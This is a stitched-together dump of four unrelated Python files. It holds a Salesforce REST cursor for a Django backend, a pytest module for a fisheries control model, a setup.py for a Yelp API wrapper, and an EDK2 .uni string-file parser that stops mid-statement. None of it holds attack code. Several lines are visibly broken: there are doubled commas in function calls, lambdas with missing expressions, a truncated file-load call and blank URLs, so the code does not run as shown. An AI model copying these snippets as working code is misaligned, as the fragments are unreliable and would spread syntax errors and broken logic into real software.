isinstance(self.query, SalesforceRawQuery): response = self.execute_select(q, args) elif isinstance(self.query, subqueries.InsertQuery): response = self.execute_insert(self.query) elif isinstance(self.query, subqueries.UpdateQuery): response = self.execute_update(self.query) elif isinstance(self.query, subqueries.DeleteQuery): response = self.execute_delete(self.query) else: raise base.DatabaseError("Unsupported query: type %s: %s" % (type(self.query), self.query)) # the encoding is detected automatically, e.g. from headers if(response and response.text): # parse_float set to decimal.Decimal to avoid precision errors when # converting from the json number to a float to a Decimal object # on a model's DecimalField...converts from json number directly # a Decimal object data = response.json(parse_float=decimal.Decimal) # a SELECT query if('totalSize' in data): self.rowcount = data['totalSize'] # a successful INSERT query, return after getting PK elif('success' in data and 'id' in data): self.lastrowid = data['id'] return # something we don't recognize else: raise base.DatabaseError(data) if q.upper().startswith('SELECT COUNT() FROM'): # COUNT() queries in SOQL are a special case, as they don't actually return rows self.results = iter([[self.rowcount]]) else: if self.query: self.query.first_chunk_len = len(data['records']) self.first_row = data['records'][0] if data['records'] else None self.results = self.query_results(data) else: self.results = iter([]) def execute_select(self, q, args): processed_sql = str(q) % process_args(args) cmd = 'query' if not getattr(self.query, 'is_query_all', False) else 'queryAll' url = u'{base}{api}/{cmd}?{query_str}'.format( base=self.session.auth.instance_url, api=API_STUB, cmd=cmd, query_str=urlencode(dict(q=processed_sql)), ) log.debug(processed_sql) return handle_api_exceptions(url, self.session.get, _cursor=self) def query_more(self, nextRecordsUrl): url = u'%s%s' % (self.session.auth.instance_url, nextRecordsUrl) return handle_api_exceptions(url, self.session.get, _cursor=self) def execute_insert(self, query): table = query.model._meta.db_table url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/' % table) headers = {'Content-Type': 'application/json'} post_data = extract_values(query) log.debug('INSERT %s%s' % (table, post_data)) return handle_api_exceptions(url,, headers=headers, data=json.dumps(post_data), _cursor=self) def execute_update(self, query): table = query.model._meta.db_table # this will break in multi-row updates if DJANGO_17_PLUS: pk = query.where.children[0].rhs elif DJANGO_16_PLUS: pk = query.where.children[0][3] else: pk = query.where.children[0].children[0][-1] assert pk url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/%s' % (table, pk)) headers = {'Content-Type': 'application/json'} post_data = extract_values(query) log.debug('UPDATE %s(%s)%s' % (table, pk, post_data)) ret = handle_api_exceptions(url, self.session.patch, headers=headers, data=json.dumps(post_data), _cursor=self) self.rowcount = 1 return ret def execute_delete(self, query): table = query.model._meta.db_table ## the root where node's children may itself have children.. def recurse_for_pk(children): for node in children: if hasattr(node, 'rhs'): pk = node.rhs[0] # for Django 1.7+ else: try: pk = node[-1][0] except TypeError: pk = recurse_for_pk(node.children) return pk pk = recurse_for_pk(self.query.where.children) assert pk url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/%s' % (table, pk)) log.debug('DELETE %s(%s)' % (table, pk)) return handle_api_exceptions(url, self.session.delete, _cursor=self) def query_results(self, results): while True: for rec in results['records']: if rec['attributes']['type'] == 'AggregateResult' and hasattr(self.query, 'aggregate_select'): assert len(rec) -1 == len(list(self.query.aggregate_select.items())) # The 'attributes' info is unexpected for Django within fields. rec = [rec[k] for k, _ in self.query.aggregate_select.items()] yield rec if results['done']: break # see about Retrieving the Remaining SOQL Query Results # response = self.query_more(results['nextRecordsUrl']) results = response.json(parse_float=decimal.Decimal) def __iter__(self): return iter(self.results) def fetchone(self): """ Fetch a single result from a previously executed query. """ try: return next(self.results) except StopIteration: return None def fetchmany(self, size=None): """ Fetch multiple results from a previously executed query. """ if size is None: size = 200 return list(islice(self.results, size)) def fetchall(self): """ Fetch all results from a previously executed query. """ return list(self.results) def close(self): # for Django 1.7+ pass string_literal = quoted_string_literal def date_literal(d, c): if not d.tzinfo: import time tz = pytz.timezone(settings.TIME_ZONE) d = tz.localize(d, is_dst=time.daylight) # Format of `%z` is "+HHMM" tzname = datetime.datetime.strftime(d, "%z") return datetime.datetime.strftime(d, "%Y-%m-%dT%H:%M:%S.000") + tzname def sobj_id(obj, conv): return # supported types sql_conversions = { int: lambda s,d: str(s), float: lambda o,d: '%.15g' % o, type(None): lambda s,d: 'NULL', str: lambda o,d: string_literal(o, d), # default bool: lambda s,d: str(s).lower(), lambda d,c:, "%Y-%m-%d"), datetime.datetime: lambda d,c: date_literal(d, c), decimal.Decimal: lambda s,d: float(s), models.SalesforceModel: sobj_id, } if not PY3: sql_conversions[long] = lambda s,d: str(s) sql_conversions[unicode] = lambda s,d: string_literal(s.encode('utf8'), d) # supported types json_conversions = { int: lambda s,d: str(s), float: lambda o,d: '%.15g' % o, type(None): lambda s,d: None, str: lambda o,d: o, # default bool: lambda s,d: str(s).lower(), lambda d,c:, "%Y-%m-%d"), datetime.datetime: date_literal, datetime.time: lambda d,c: datetime.time.strftime(d, "%H:%M:%S.%f"), decimal.Decimal: lambda s,d: float(s), models.SalesforceModel: sobj_id, } if not PY3: json_conversions[long] = lambda s,d: str(s) json_conversions[unicode] = lambda s,d: s.encode('utf8')
# Copyright 2019 Alastair Pharo # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest import numpy import os import scipy from numpy.testing import assert_allclose from infsocsol.helpers import matrix @pytest.fixture(scope="module", params=[ # engine states time_step start steps steady steady_accuracy optim_accuracy ( 'matlab', 10, 1, (100.0, 0.5), 100, True, 0.01, 0.009 ), ( 'matlab', 20, 0.5, (600.0, 0.6), 200, True, 0.01, 0.015 ), ( 'matlab', 40, 0.25, (60.0, 0.1), 300, True, 0.01, 0.018 ), ( 'matlab', 10, 1, (600.0, 1.0), 200, False, 0.001, None ), ( 'octave', 10, 1, (100.0, 0.5), 100, True, 0.001, 0.009 ), ( 'octave', 20, 0.5, (600.0, 0.6), 200, True, 0.001, 0.015 ) ]) def fisheries_scenario(request): return request.param def test_fisheries_det_basic(engines, fisheries_scenario): _engine, states, time_step, _start, steps, steady, steady_accuracy, optim_accuracy = fisheries_scenario engine = engines[_engine] start = matrix(engine, _start), "fisheries_det_basic")) engine.solve(float(states), float(time_step), nargout=0) final = numpy.array(engine.sim_final(start, steps)) # This is determined by setting s\dot = 0, which solves to 1 = x/L + q/r e steady_one =, [1/600, 5/4]) if steady: assert_allclose(steady_one, 1, atol=steady_accuracy) # This is the most profitable steady state -- x = L/2 + c/2pq profit_max_steady = numpy.array([[302.5, 0.39667]]) assert_allclose(final, profit_max_steady, rtol=optim_accuracy) else: assert steady_one > 1 + steady_accuracy
#!/usr/bin/env python # -*- encoding: utf-8 -*- from os.path import join from setuptools import setup, find_packages import pyyelp # To get python test to work on python 2.7 try: import multiprocessing import logging except ImportError: pass setup( name=pyyelp.__name__, version=pyyelp.__version__, author=pyyelp.__author__, author_email=pyyelp.__email__, url='', download_url = '{0}'.format(pyyelp.__version__), description='Python wrapper for the Yelp v2 api', long_description=open('').read(), license='ISC', packages = [pyyelp.__name__], keywords = ['yelp', 'wrapper', 'api'], install_requires=map(str.strip,open(join('requirements', 'base.txt'))), include_package_data=True, classifiers=( 'Programming Language :: Python', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'License :: OSI Approved :: ISC License (ISCL)', 'Operating System :: OS Independent', 'Development Status :: 2 - Pre-Alpha', 'Intended Audience :: Developers', ), )
## @file # Collect all defined strings in multiple uni files. # # Copyright (c) 2014 - 2019, Intel Corporation. All rights reserved.<BR> # # This program and the accompanying materials are licensed and made available # under the terms and conditions of the BSD License which accompanies this # distribution. The full text of the license may be found at # # # THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, # WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. # """ Collect all defined strings in multiple uni files """ from __future__ import print_function ## # Import Modules # import os, codecs, re import distutils.util from Logger import ToolError from Logger import Log as EdkLogger from Logger import StringTable as ST from Library.StringUtils import GetLineNo from Library.Misc import PathClass from Library.Misc import GetCharIndexOutStr from Library import DataType as DT from Library.ParserValidate import CheckUTF16FileHeader ## # Static definitions # UNICODE_WIDE_CHAR = u'\\wide' UNICODE_NARROW_CHAR = u'\\narrow' UNICODE_NON_BREAKING_CHAR = u'\\nbr' UNICODE_UNICODE_CR = '\r' UNICODE_UNICODE_LF = '\n' NARROW_CHAR = u'\uFFF0' WIDE_CHAR = u'\uFFF1' NON_BREAKING_CHAR = u'\uFFF2' CR = u'\u000D' LF = u'\u000A' NULL = u'\u0000' TAB = u'\t' BACK_SPLASH = u'\\' gLANG_CONV_TABLE = {'eng':'en', 'fra':'fr', \ 'aar':'aa', 'abk':'ab', 'ave':'ae', 'afr':'af', 'aka':'ak', 'amh':'am', \ 'arg':'an', 'ara':'ar', 'asm':'as', 'ava':'av', 'aym':'ay', 'aze':'az', \ 'bak':'ba', 'bel':'be', 'bul':'bg', 'bih':'bh', 'bis':'bi', 'bam':'bm', \ 'ben':'bn', 'bod':'bo', 'bre':'br', 'bos':'bs', 'cat':'ca', 'che':'ce', \ 'cha':'ch', 'cos':'co', 'cre':'cr', 'ces':'cs', 'chu':'cu', 'chv':'cv', \ 'cym':'cy', 'dan':'da', 'deu':'de', 'div':'dv', 'dzo':'dz', 'ewe':'ee', \ 'ell':'el', 'epo':'eo', 'spa':'es', 'est':'et', 'eus':'eu', 'fas':'fa', \ 'ful':'ff', 'fin':'fi', 'fij':'fj', 'fao':'fo', 'fry':'fy', 'gle':'ga', \ 'gla':'gd', 'glg':'gl', 'grn':'gn', 'guj':'gu', 'glv':'gv', 'hau':'ha', \ 'heb':'he', 'hin':'hi', 'hmo':'ho', 'hrv':'hr', 'hat':'ht', 'hun':'hu', \ 'hye':'hy', 'her':'hz', 'ina':'ia', 'ind':'id', 'ile':'ie', 'ibo':'ig', \ 'iii':'ii', 'ipk':'ik', 'ido':'io', 'isl':'is', 'ita':'it', 'iku':'iu', \ 'jpn':'ja', 'jav':'jv', 'kat':'ka', 'kon':'kg', 'kik':'ki', 'kua':'kj', \ 'kaz':'kk', 'kal':'kl', 'khm':'km', 'kan':'kn', 'kor':'ko', 'kau':'kr', \ 'kas':'ks', 'kur':'ku', 'kom':'kv', 'cor':'kw', 'kir':'ky', 'lat':'la', \ 'ltz':'lb', 'lug':'lg', 'lim':'li', 'lin':'ln', 'lao':'lo', 'lit':'lt', \ 'lub':'lu', 'lav':'lv', 'mlg':'mg', 'mah':'mh', 'mri':'mi', 'mkd':'mk', \ 'mal':'ml', 'mon':'mn', 'mar':'mr', 'msa':'ms', 'mlt':'mt', 'mya':'my', \ 'nau':'na', 'nob':'nb', 'nde':'nd', 'nep':'ne', 'ndo':'ng', 'nld':'nl', \ 'nno':'nn', 'nor':'no', 'nbl':'nr', 'nav':'nv', 'nya':'ny', 'oci':'oc', \ 'oji':'oj', 'orm':'om', 'ori':'or', 'oss':'os', 'pan':'pa', 'pli':'pi', \ 'pol':'pl', 'pus':'ps', 'por':'pt', 'que':'qu', 'roh':'rm', 'run':'rn', \ 'ron':'ro', 'rus':'ru', 'kin':'rw', 'san':'sa', 'srd':'sc', 'snd':'sd', \ 'sme':'se', 'sag':'sg', 'sin':'si', 'slk':'sk', 'slv':'sl', 'smo':'sm', \ 'sna':'sn', 'som':'so', 'sqi':'sq', 'srp':'sr', 'ssw':'ss', 'sot':'st', \ 'sun':'su', 'swe':'sv', 'swa':'sw', 'tam':'ta', 'tel':'te', 'tgk':'tg', \ 'tha':'th', 'tir':'ti', 'tuk':'tk', 'tgl':'tl', 'tsn':'tn', 'ton':'to', \ 'tur':'tr', 'tso':'ts', 'tat':'tt', 'twi':'tw', 'tah':'ty', 'uig':'ug', \ 'ukr':'uk', 'urd':'ur', 'uzb':'uz', 'ven':'ve', 'vie':'vi', 'vol':'vo', \ 'wln':'wa', 'wol':'wo', 'xho':'xh', 'yid':'yi', 'yor':'yo', 'zha':'za', \ 'zho':'zh', 'zul':'zu'} ## Convert a python unicode string to a normal string # # Convert a python unicode string to a normal string # UniToStr(u'I am a string') is 'I am a string' # # @param Uni: The python unicode string # # @retval: The formatted normal string # def UniToStr(Uni): return repr(Uni)[2:-1] ## Convert a unicode string to a Hex list # # Convert a unicode string to a Hex list # UniToHexList('ABC') is ['0x41', '0x00', '0x42', '0x00', '0x43', '0x00'] # # @param Uni: The python unicode string # # @retval List: The formatted hex list # def UniToHexList(Uni): List = [] for Item in Uni: Temp = '%04X' % ord(Item) List.append('0x' + Temp[2:4]) List.append('0x' + Temp[0:2]) return List ## Convert special unicode characters # # Convert special characters to (c), (r) and (tm). # # @param Uni: The python unicode string # # @retval NewUni: The converted unicode string # def ConvertSpecialUnicodes(Uni): OldUni = NewUni = Uni NewUni = NewUni.replace(u'\u00A9', '(c)') NewUni = NewUni.replace(u'\u00AE', '(r)') NewUni = NewUni.replace(u'\u2122', '(tm)') if OldUni == NewUni: NewUni = OldUni return NewUni ## GetLanguageCode1766 # # Check the language code read from .UNI file and convert RFC 4646 codes to RFC 1766 codes # RFC 1766 language codes supported in compatibility mode # RFC 4646 language codes supported in native mode # # @param LangName: Language codes read from .UNI file # # @retval LangName: Valid language code in RFC 1766 format or None # def GetLanguageCode1766(LangName, File=None): return LangName length = len(LangName) if length == 2: if LangName.isalpha(): for Key in gLANG_CONV_TABLE.keys(): if gLANG_CONV_TABLE.get(Key) == LangName.lower(): return Key elif length == 3: if LangName.isalpha() and gLANG_CONV_TABLE.get(LangName.lower()): return LangName else: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, "Invalid RFC 1766 language code : %s" % LangName, File) elif length == 5: if LangName[0:2].isalpha() and LangName[2] == '-': for Key in gLANG_CONV_TABLE.keys(): if gLANG_CONV_TABLE.get(Key) == LangName[0:2].lower(): return Key elif length >= 6: if LangName[0:2].isalpha() and LangName[2] == '-': for Key in gLANG_CONV_TABLE.keys(): if gLANG_CONV_TABLE.get(Key) == LangName[0:2].lower(): return Key if LangName[0:3].isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None and LangName[3] == '-': for Key in gLANG_CONV_TABLE.keys(): if Key == LangName[0:3].lower(): return Key EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, "Invalid RFC 4646 language code : %s" % LangName, File) ## GetLanguageCode # # Check the language code read from .UNI file and convert RFC 1766 codes to RFC 4646 codes if appropriate # RFC 1766 language codes supported in compatibility mode # RFC 4646 language codes supported in native mode # # @param LangName: Language codes read from .UNI file # # @retval LangName: Valid lanugage code in RFC 4646 format or None # def GetLanguageCode(LangName, IsCompatibleMode, File): length = len(LangName) if IsCompatibleMode: if length == 3 and LangName.isalpha(): TempLangName = gLANG_CONV_TABLE.get(LangName.lower()) if TempLangName is not None: return TempLangName return LangName else: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, "Invalid RFC 1766 language code : %s" % LangName, File) if (LangName[0] == 'X' or LangName[0] == 'x') and LangName[1] == '-': return LangName if length == 2: if LangName.isalpha(): return LangName elif length == 3: if LangName.isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None: return LangName elif length == 5: if LangName[0:2].isalpha() and LangName[2] == '-': return LangName elif length >= 6: if LangName[0:2].isalpha() and LangName[2] == '-': return LangName if LangName[0:3].isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None and LangName[3] == '-': return LangName EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, "Invalid RFC 4646 language code : %s" % LangName, File) ## FormatUniEntry # # Formatted the entry in Uni file. # # @param StrTokenName StrTokenName. # @param TokenValueList A list need to be processed. # @param ContainerFile ContainerFile. # # @return formatted entry def FormatUniEntry(StrTokenName, TokenValueList, ContainerFile): SubContent = '' PreFormatLength = 40 if len(StrTokenName) > PreFormatLength: PreFormatLength = len(StrTokenName) + 1 for (Lang, Value) in TokenValueList: if not Value or Lang == DT.TAB_LANGUAGE_EN_X: continue if Lang == '': Lang = DT.TAB_LANGUAGE_EN_US if Lang == 'eng': Lang = DT.TAB_LANGUAGE_EN_US elif len(Lang.split('-')[0]) == 3: Lang = GetLanguageCode(Lang.split('-')[0], True, ContainerFile) else: Lang = GetLanguageCode(Lang, False, ContainerFile) ValueList = Value.split('\n') SubValueContent = '' for SubValue in ValueList: if SubValue.strip(): SubValueContent += \ ' ' * (PreFormatLength + len('#language en-US ')) + '\"%s\\n\"' % SubValue.strip() + '\r\n' SubValueContent = SubValueContent[(PreFormatLength + len('#language en-US ')):SubValueContent.rfind('\\n')] \ + '\"' + '\r\n' SubContent += ' '*PreFormatLength + '#language %-5s ' % Lang + SubValueContent if SubContent: SubContent = StrTokenName + ' '*(PreFormatLength - len(StrTokenName)) + SubContent[PreFormatLength:] return SubContent ## StringDefClassObject # # A structure for language definition # class StringDefClassObject(object): def __init__(self, Name = None, Value = None, Referenced = False, Token = None, UseOtherLangDef = ''): self.StringName = '' self.StringNameByteList = [] self.StringValue = '' self.StringValueByteList = '' self.Token = 0 self.Referenced = Referenced self.UseOtherLangDef = UseOtherLangDef self.Length = 0 if Name is not None: self.StringName = Name self.StringNameByteList = UniToHexList(Name) if Value is not None: self.StringValue = Value self.StringValueByteList = UniToHexList(self.StringValue) self.Length = len(self.StringValueByteList) if Token is not None: self.Token = Token def __str__(self): return repr(self.StringName) + ' ' + \ repr(self.Token) + ' ' + \ repr(self.Referenced) + ' ' + \ repr(self.StringValue) + ' ' + \ repr(self.UseOtherLangDef) def UpdateValue(self, Value = None): if Value is not None: if self.StringValue: self.StringValue = self.StringValue + '\r\n' + Value else: self.StringValue = Value self.StringValueByteList = UniToHexList(self.StringValue) self.Length = len(self.StringValueByteList) ## UniFileClassObject # # A structure for .uni file definition # class UniFileClassObject(object): def __init__(self, FileList = None, IsCompatibleMode = False, IncludePathList = None): self.FileList = FileList self.File = None self.IncFileList = FileList self.UniFileHeader = '' self.Token = 2 self.LanguageDef = [] #[ [u'LanguageIdentifier', u'PrintableName'], ... ] self.OrderedStringList = {} #{ u'LanguageIdentifier' : [StringDefClassObject] } self.OrderedStringDict = {} #{ u'LanguageIdentifier' : {StringName:(IndexInList)} } self.OrderedStringListByToken = {} #{ u'LanguageIdentifier' : {Token: StringDefClassObject} } self.IsCompatibleMode = IsCompatibleMode if not IncludePathList: self.IncludePathList = [] else: self.IncludePathList = IncludePathList if len(self.FileList) > 0: self.LoadUniFiles(FileList) # # Get Language definition # def GetLangDef(self, File, Line): Lang = distutils.util.split_quoted((Line.split(u"//")[0])) if len(Lang) != 3: try: FileIn =, mode='rb', encoding='utf_8').readlines() except UnicodeError as Xstr: FileIn =, mode='rb', encoding='utf_16').readlines() except UnicodeError as Xstr: FileIn =, mode='rb', encoding='utf_16_le').readlines() except: EdkLogger.Error("Unicode File Parser", ToolError.FILE_OPEN_FAILURE, "File read failure: %s" % str(Xstr), ExtraData=File) LineNo = GetLineNo(FileIn, Line, False) EdkLogger.Error("Unicode File Parser", ToolError.PARSER_ERROR, "Wrong language definition", ExtraData="""%s\n\t*Correct format is like '#langdef en-US "English"'""" % Line, File = File, Line = LineNo) else: LangName = GetLanguageCode(Lang[1], self.IsCompatibleMode, self.File) LangPrintName = Lang[2] IsLangInDef = False for Item in self.LanguageDef: if Item[0] == LangName: IsLangInDef = True break if not IsLangInDef: self.LanguageDef.append([LangName, LangPrintName]) # # Add language string # self.AddStringToList(u'$LANGUAGE_NAME', LangName, LangName, 0, True, Index=0) self.AddStringToList(u'$PRINTABLE_LANGUAGE_NAME', LangName, LangPrintName, 1, True, Index=1) if not IsLangInDef: # # The found STRING tokens will be added into new language string list # so that the unique STRING identifier is reserved for all languages in the package list. # FirstLangName = self.LanguageDef[0][0] if LangName != FirstLangName: for Index in range (2, len (self.OrderedStringList[FirstLangName])): Item = self.OrderedStringList[FirstLangName][Index] if Item.UseOtherLangDef != '': OtherLang = Item.UseOtherLangDef else: OtherLang = FirstLangName self.OrderedStringList[LangName].append (StringDefClassObject(Item.StringName, '', Item.Referenced, Item.Token, OtherLang)) self.OrderedStringDict[LangName][Item.StringName] = len(self.OrderedStringList[LangName]) - 1 return True # # Get String name and value # def GetStringObject(self, Item): Language = '' Value = '' Name = Item.split()[1] # Check the string name is the upper character if Name != '': MatchString = re.match('[A-Z0-9_]+', Name, re.UNICODE) if MatchString is None or MatchString.end(0) != len(Name): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, 'The string token name %s in UNI file %s must be upper case character.' %(Name, self.File)) LanguageList = Item.split(u'#language ') for IndexI in range(len(LanguageList)): if IndexI == 0: continue else: Language = LanguageList[IndexI].split()[0] #.replace(u'\r\n', u'') Value = \ LanguageList[IndexI][LanguageList[IndexI].find(u'\"') + len(u'\"') : LanguageList[IndexI].rfind(u'\"')] Language = GetLanguageCode(Language, self.IsCompatibleMode, self.File) self.AddStringToList(Name, Language, Value) # # Get include file list and load them # def GetIncludeFile(self, Item, Dir = None): if Dir: pass FileName = Item[Item.find(u'!include ') + len(u'!include ') :Item.find(u' ', len(u'!include '))][1:-1] self.LoadUniFile(FileName) # # Pre-process before parse .uni file # def PreProcess(self, File, IsIncludeFile=False): if not os.path.exists(File.Path) or not os.path.isfile(File.Path): EdkLogger.Error("Unicode File Parser", ToolError.FILE_NOT_FOUND, ExtraData=File.Path) # # Check file header of the Uni file # # if not CheckUTF16FileHeader(File.Path): # EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, # ExtraData='The file %s is either invalid UTF-16LE or it is missing the BOM.' % File.Path) try: FileIn =, mode='rb', encoding='utf_8').readlines() except UnicodeError as Xstr: FileIn =, mode='rb', encoding='utf_16').readlines() except UnicodeError: FileIn =, mode='rb', encoding='utf_16_le').readlines() except: EdkLogger.Error("Unicode File Parser", ToolError.FILE_OPEN_FAILURE, ExtraData=File.Path) # # get the file header # Lines = [] HeaderStart = False HeaderEnd = False if not self.UniFileHeader: FirstGenHeader = True else: FirstGenHeader = False for Line in FileIn: Line = Line.strip() if Line == u'': continue if Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and (Line.find(DT.TAB_HEADER_COMMENT) > -1) \ and not HeaderEnd and not HeaderStart: HeaderStart = True if not Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and HeaderStart and not HeaderEnd: HeaderEnd = True if Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and HeaderStart and not HeaderEnd and FirstGenHeader: self.UniFileHeader += Line + '\r\n' continue # # Use unique identifier # FindFlag = -1 LineCount = 0 MultiLineFeedExits = False # # 0: initial value # 1: single String entry exist # 2: line feed exist under the some single String entry # StringEntryExistsFlag = 0 for Line in FileIn: Line = FileIn[LineCount] LineCount += 1 Line = Line.strip() # # Ignore comment line and empty line # if Line == u'' or Line.startswith(u'//'): # # Change the single line String entry flag status # if StringEntryExistsFlag == 1: StringEntryExistsFlag = 2 # # If the '#string' line and the '#language' line are not in the same line, # there should be only one line feed character between them # if MultiLineFeedExits: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) continue MultiLineFeedExits = False # # Process comment embedded in string define lines # FindFlag = Line.find(u'//') if FindFlag != -1 and Line.find(u'//') < Line.find(u'"'): Line = Line.replace(Line[FindFlag:], u' ') if FileIn[LineCount].strip().startswith('#language'): Line = Line + FileIn[LineCount] FileIn[LineCount-1] = Line FileIn[LineCount] = '\r\n' LineCount -= 1 for Index in range (LineCount + 1, len (FileIn) - 1): if (Index == len(FileIn) -1): FileIn[Index] = '\r\n' else: FileIn[Index] = FileIn[Index + 1] continue CommIndex = GetCharIndexOutStr(u'/', Line) if CommIndex > -1: if (len(Line) - 1) > CommIndex: if Line[CommIndex+1] == u'/': Line = Line[:CommIndex].strip() else: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) else: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) Line = Line.replace(UNICODE_WIDE_CHAR, WIDE_CHAR) Line = Line.replace(UNICODE_NARROW_CHAR, NARROW_CHAR) Line = Line.replace(UNICODE_NON_BREAKING_CHAR, NON_BREAKING_CHAR) Line = Line.replace(u'\\\\', u'\u0006') Line = Line.replace(u'\\r\\n', CR + LF) Line = Line.replace(u'\\n', CR + LF) Line = Line.replace(u'\\r', CR) Line = Line.replace(u'\\t', u'\t') Line = Line.replace(u'''\"''', u'''"''') Line = Line.replace(u'\t', u' ') Line = Line.replace(u'\u0006', u'\\') # # Check if single line has correct '"' # if Line.startswith(u'#string') and Line.find(u'#language') > -1 and Line.find('"') > Line.find(u'#language'): if not Line.endswith('"'): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData='''The line %s misses '"' at the end of it in file %s''' % (LineCount, File.Path)) # # Between Name entry and Language entry can not contain line feed # if Line.startswith(u'#string') and Line.find(u'#language') == -1: MultiLineFeedExits = True if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.find(u'"') < 0: MultiLineFeedExits = True # # Between Language entry and String entry can not contain line feed # if Line.startswith(u'#language') and len(Line.split()) == 2: MultiLineFeedExits = True # # Check the situation that there only has one '"' for the language entry # if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.count(u'"') == 1: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData='''The line %s misses '"' at the end of it in file %s''' % (LineCount, File.Path)) # # Check the situation that there has more than 2 '"' for the language entry # if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.replace(u'\\"', '').count(u'"') > 2: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData='''The line %s has more than 2 '"' for language entry in file %s''' % (LineCount, File.Path)) # # Between two String entry, can not contain line feed # if Line.startswith(u'"'): if StringEntryExistsFlag == 2: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, Message=ST.ERR_UNIPARSE_LINEFEED_UP_EXIST % Line, ExtraData=File.Path) StringEntryExistsFlag = 1 if not Line.endswith('"'): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData='''The line %s misses '"' at the end of it in file %s''' % (LineCount, File.Path)) # # Check the situation that there has more than 2 '"' for the language entry # if Line.strip() and Line.replace(u'\\"', '').count(u'"') > 2: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData='''The line %s has more than 2 '"' for language entry in file %s''' % (LineCount, File.Path)) elif Line.startswith(u'#language'): if StringEntryExistsFlag == 2: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, Message=ST.ERR_UNI_MISS_STRING_ENTRY % Line, ExtraData=File.Path) StringEntryExistsFlag = 0 else: StringEntryExistsFlag = 0 Lines.append(Line) # # Convert string def format as below # # #string MY_STRING_1 # #language eng # "My first English string line 1" # "My first English string line 2" # #string MY_STRING_1 # #language spa # "Mi segunda secuencia 1" # "Mi segunda secuencia 2" # if not IsIncludeFile and not Lines: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_NO_SECTION_EXIST, \ ExtraData=File.Path) NewLines = [] StrName = u'' ExistStrNameList = [] for Line in Lines: if StrName and not StrName.split()[1].startswith(DT.TAB_STR_TOKENCNAME + DT.TAB_UNDERLINE_SPLIT): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_STRNAME_FORMAT_ERROR % StrName.split()[1], \ ExtraData=File.Path) if StrName and len(StrName.split()[1].split(DT.TAB_UNDERLINE_SPLIT)) == 4: StringTokenList = StrName.split()[1].split(DT.TAB_UNDERLINE_SPLIT) if (StringTokenList[3].upper() in [DT.TAB_STR_TOKENPROMPT, DT.TAB_STR_TOKENHELP] and \ StringTokenList[3] not in [DT.TAB_STR_TOKENPROMPT, DT.TAB_STR_TOKENHELP]) or \ (StringTokenList[2].upper() == DT.TAB_STR_TOKENERR and StringTokenList[2] != DT.TAB_STR_TOKENERR): EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_STRTOKEN_FORMAT_ERROR % StrName.split()[1], \ ExtraData=File.Path) if Line.count(u'#language') > 1: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_SEP_LANGENTRY_LINE % Line, \ ExtraData=File.Path) if Line.startswith(u'//'): continue elif Line.startswith(u'#langdef'): if len(Line.split()) == 2: NewLines.append(Line) continue elif len(Line.split()) > 2 and Line.find(u'"') > 0: NewLines.append(Line[:Line.find(u'"')].strip()) NewLines.append(Line[Line.find(u'"'):]) else: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path) elif Line.startswith(u'#string'): if len(Line.split()) == 2: StrName = Line if StrName: if StrName.split()[1] not in ExistStrNameList: ExistStrNameList.append(StrName.split()[1].strip()) elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \ DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \ DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \ DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]: EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \ Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \ ExtraData=File.Path) continue elif len(Line.split()) == 4 and Line.find(u'#language') > 0: if Line[Line.find(u'#language')-1] != ' ' or \ Line[Line.find(u'#language')+len(u'#language')] != u' ': 